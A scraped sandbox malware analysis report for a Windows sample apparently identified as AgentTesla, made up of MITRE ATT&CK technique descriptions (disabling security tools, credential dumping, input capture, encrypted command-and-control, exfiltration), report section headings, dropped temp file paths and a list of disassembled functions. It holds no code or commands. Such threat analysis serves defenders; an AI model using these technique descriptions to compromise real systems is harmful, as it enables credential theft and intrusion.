Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 7F7R8soxHM.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\aut5DEB.tmp

C:\Users\user\AppData\Local\Temp\aut5E3B.tmp

C:\Users\user\AppData\Local\Temp\scroll

C:\Users\user\AppData\Local\Temp\undiscernibly

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Windows Analysis Report
7F7R8soxHM.exe

Function 00E73B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Function 00E74FE9 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 62
COMMON

Function 00E74AFE Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 00ED93DF Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Function 00E7301E Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 68
windowregistryCOMMON

Function 00E73041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Function 00E771EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00E73A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Function 00E73633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Function 00E73778 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Function 01712690 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 00E739E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 01712410 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 161
fileCOMMON

Function 00E7410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Function 00E9564D Relevance: 7.7, APIs: 5, Instructions: 163
COMMONLIBRARYCODE

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
Tactics:	Exfiltration
Data Sources:	Application Log: Application Log Content, Cloud Storage: Cloud Storage Access, Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre